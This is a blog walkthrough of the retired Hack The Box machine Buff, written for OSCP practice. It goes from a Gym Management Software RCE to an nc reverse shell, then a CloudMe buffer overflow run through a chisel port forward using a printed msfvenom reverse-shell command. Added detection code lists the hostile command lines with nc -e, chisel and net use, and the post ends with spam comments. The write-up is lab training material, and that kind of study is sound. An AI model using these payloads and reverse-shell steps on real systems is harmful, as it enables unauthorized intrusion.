OSCP PREPARATIONS – HTB Buff

Buff is a retired Hack The Box machine running Windows. The goal is to use its vulnerabilities to obtain the user and root flags.
We start with an nmap scan to get to know the target machine.
Classic Scan

Full Port Scan

The port scan shows two open ports: 7680/tcp (pando-pub) and 8080/tcp (http, Apache 2.4.43).
We continue enumeration on port 8080.
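The scan output itself is only a screenshot in the original post, so here is an added example (not part of the writeup) of turning nmap's grepable (-oG) output into a list of open ports and service versions that later steps can work from. The nmap text below is constructed to resemble the result described above; 192.0.2.10 is a placeholder address and the full version strings are assumptions. The one parsing detail worth knowing is that nmap writes "|" in place of "/" inside the version field so the slash-separated layout stays unambiguous.

```python
import re
from typing import Dict, List, Tuple

# Constructed grepable (-oG) nmap output shaped like the scan in this walkthrough.
# 192.0.2.10 is a placeholder address and the version strings are made up for the
# example; nothing here is copied from the actual scan of the machine.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -p- -sV -oG buff.gnmap 192.0.2.10\n"
    "Host: 192.0.2.10 ()\tStatus: Up\n"
    "Host: 192.0.2.10 ()\tPorts: 7680/open/tcp//pando-pub///, "
    "8080/open/tcp//http//Apache httpd 2.4.43 ((Win64) OpenSSL|1.1.1g PHP|7.4.6)/, "
    "445/filtered/tcp//microsoft-ds///\tIgnored State: closed (65532)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 120.00 seconds\n"
)

# port/state/protocol/owner/service/rpc-info/version/  (seven fields, trailing slash)
PORT_ENTRY = re.compile(r"^(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/$")


def parse_gnmap(text: str) -> List[Dict[str, object]]:
    """Parse grepable nmap output into one record per port entry.

    Only 'Host:' lines that carry a 'Ports:' field are used. Inside the version
    field nmap replaces '/' with '|' so the slash-separated layout stays unambiguous;
    the replacement is undone here so the version reads as nmap prints it on screen.
    """
    records = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        ports_field = re.search(r"\tPorts: ([^\t]*)", line)
        if ports_field is None:
            continue
        for entry in ports_field.group(1).split(", "):
            m = PORT_ENTRY.match(entry.strip())
            if m is None:
                continue  # skip anything that does not follow the seven-field layout
            port, state, proto, _owner, service, _rpc, version = m.groups()
            records.append({"host": host, "port": int(port), "state": state,
                            "proto": proto, "service": service,
                            "version": version.replace("|", "/")})
    return records


def open_tcp_ports(records) -> List[Tuple[int, str, str]]:
    """Return (port, service, version) for open TCP ports, lowest port first."""
    return sorted((r["port"], r["service"], r["version"])
                  for r in records if r["state"] == "open" and r["proto"] == "tcp")


if __name__ == "__main__":
    for port, service, version in open_tcp_ports(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{port}/tcp  {service:<14} {version}")
```

Filtered and closed ports are kept in the records but left out of `open_tcp_ports`, so the same parser can feed a report on what the firewall is hiding as well as what is exposed.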

The page source gives us nothing, but from its general appearance we can tell it is a fitness website.
We scan for hidden files and directories with gobuster.

The scan finds nothing useful.
We continue enumerating from the web interface.

The site was made with Gym Management Software 1.0, so let's search for a vulnerability related to it.

We find an RCE vulnerability for it. Let's pull the exploit to our local machine and look at it.

There is nothing in the code we need to change, so we use it as is.

It gives us a shell as the user buff\shaun.
However, this shell is not stable: we cannot change directories, for example.
Let's get nc onto the box and use it to give ourselves a stable shell.
When we offer our SMB share without a password, Windows does not accept it, so we cannot use it from PowerShell.

Therefore we create the share with a username and password using smbshare.

We successfully copy nc.
Now it's time to run nc and get a reverse shell.

We have our shell and obtain the user flag, but we cannot access the Administrator folder, so we continue with local enumeration.

We download winPEAS.exe.

Here we see that CloudMe_1112.exe is running on the machine.
(CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software).
Let's see whether there is a vulnerability related to it.

There are exploits for this version of CloudMe, but they are written in Python, and Python is not installed on Windows by default, so instead we will use port forwarding and run the exploit from our own machine.
We transfer chisel to the target machine.

Let's set up port forwarding with chisel.

With port forwarding in place, it is time to list the exploits for CloudMe.
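From the blue-team side, the sequence above (an SMB share mapped with credentials, nc.exe copied from it and run with -e, then a chisel reverse port forward from the foothold account) leaves a very recognisable trail in process-creation telemetry. The following is an added example, not part of the original writeup, of detection logic run over constructed Sysmon-style events that mirror both the stable-shell step and the port-forwarding step. The file paths, share name, credential, chisel server port and the forwarded local port are all assumptions made for the sample; the attacker address 10.10.14.19 and port 4700 are the ones used later in the post.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 style, reduced to four
# fields). They are made up to resemble the steps in this walkthrough: a shell
# spawned under the Apache process, an SMB share mapped with credentials, nc.exe
# copied from that share and run with -e, then a chisel reverse port forward.
# Paths, share name, credential and the forwarded port are assumptions for the
# example, not values taken from the machine.
SAMPLE_EVENTS = [
    {"user": r"buff\shaun", "parent": r"C:\xampp\apache\bin\httpd.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c whoami"},
    {"user": r"buff\shaun", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\10.10.14.19\share /user:smbuser ExamplePass1"},
    {"user": r"buff\shaun", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy \\10.10.14.19\share\nc.exe C:\Users\shaun\Desktop\nc.exe"},
    {"user": r"buff\shaun", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\shaun\Desktop\nc.exe",
     "cmdline": r"nc.exe 10.10.14.19 4700 -e cmd.exe"},
    {"user": r"buff\shaun", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\shaun\Desktop\chisel.exe",
     "cmdline": r"chisel.exe client 10.10.14.19:8000 R:8888:127.0.0.1:8888"},
    {"user": r"NT AUTHORITY\SYSTEM", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": r"svchost.exe -k netsvcs"},
]

# Each rule is one stage of the chain seen in the walkthrough. Rules are deliberately
# narrow on their own; the grouping below is what turns them into a useful alert.
RULES = {
    "web server spawned a shell":
        lambda e: e["parent"].lower().endswith(("httpd.exe", "w3wp.exe", "nginx.exe", "php-cgi.exe"))
        and e["image"].lower().endswith(("cmd.exe", "powershell.exe")),
    "net use with inline credentials":
        lambda e: re.search(r"\bnet(?:\.exe)?\s+use\b.*\\\\\S+.*/user:", e["cmdline"], re.I) is not None,
    "file copied from a UNC path":
        lambda e: re.search(r"\bcopy\b.*\\\\\d{1,3}(?:\.\d{1,3}){3}\\", e["cmdline"], re.I) is not None,
    "netcat launched with -e":
        lambda e: re.search(r"\bnc(?:64)?(?:\.exe)?\b.*\s-e\s+(?:cmd|powershell)", e["cmdline"], re.I) is not None,
    "chisel reverse port forward":
        lambda e: re.search(r"\bchisel(?:\.exe)?\s+client\b.*\sR:\d+:", e["cmdline"], re.I) is not None,
}


def analyze(events):
    """Return (event index, rule name) pairs for every rule each event triggers."""
    return [(i, name) for i, ev in enumerate(events)
            for name, pred in RULES.items() if pred(ev)]


def staged_tooling(events, threshold=3):
    """Group hits by account and report accounts that trip at least `threshold`
    distinct rules. A single hit is noisy (administrators map shares too); the
    chain of credentials, copy, nc -e and a reverse port forward under one
    account is the pattern worth escalating."""
    hits = defaultdict(set)
    for i, name in analyze(events):
        hits[events[i]["user"]].add(name)
    return {user: sorted(names) for user, names in hits.items() if len(names) >= threshold}


if __name__ == "__main__":
    for i, name in analyze(SAMPLE_EVENTS):
        print(f"event {i}: {name} :: {SAMPLE_EVENTS[i]['cmdline']}")
    for user, names in staged_tooling(SAMPLE_EVENTS).items():
        print(f"\nESCALATE {user}: {len(names)} distinct stages -> {', '.join(names)}")
```

The first rule is the one that would have fired earliest on this box: a web server process should never have cmd.exe or powershell.exe as a child, and that single parent/child pair catches the Gym Management Software RCE regardless of what the attacker types next.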

Here we download the PoC exploit and edit it.

As you can see, it opens the calculator; we want something more, namely a reverse shell.
We generate the payload with msfvenom:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4700 -b '\x00\x0A\x0D' -f python -v payload

We update the existing exploit with the payload we just generated.
I'll add the payload and put the shell listener on standby.

And we get a shell as the Administrator user.
This is how we obtain our root flag.

Comments

  1. najlepszy sklep

    I really like your blog.. very nice colors & theme.
    Did you make this website yourself or did you hire someone
    to do it for you? Plz reply as I’m looking to create my own blog and would
    like to know where u got this from. thanks I saw similar here:
    Najlepszy sklep

  2. ecommerce

    Hello there! Do you know if they make any plugins to help with SEO?
    I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good success.
    If you know of any please share. Cheers! You can read
    similar text here: Sklep internetowy

  3. Szpiegowskie Telefonu

    You can use parental control software to guide and supervise children's behaviour on the Internet. With the 10 smartest parental control programs you can track your child's call history, browsing history, access to dangerous content, the apps they install, etc.

  4. Backlink Building

    Hello there! Do you know if they make any plugins
    to assist with Search Engine Optimization? I’m trying to get my blog
    to rank for some targeted keywords but I’m not seeing very good results.
    If you know of any please share. Cheers! I saw similar blog here: Backlinks List

  5. Etha Canner

    Hi are using WordPress for your site platform? I’m new to the blog world but I’m trying to get started and create my own. Do you require any html coding knowledge to make your own blog? Any help would be greatly appreciated!

  6. Puravive

    Only wanna remark on few general things, The website pattern is perfect, the content material is real fantastic. “By following the concept of ‘one country, two systems,’ you don’t swallow me up nor I you.” by Deng Xiaoping.

  7. uweed

    Howdy! Do you know if they make any plugins to assist with SEO? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results. If you know of any please share. Appreciate it!
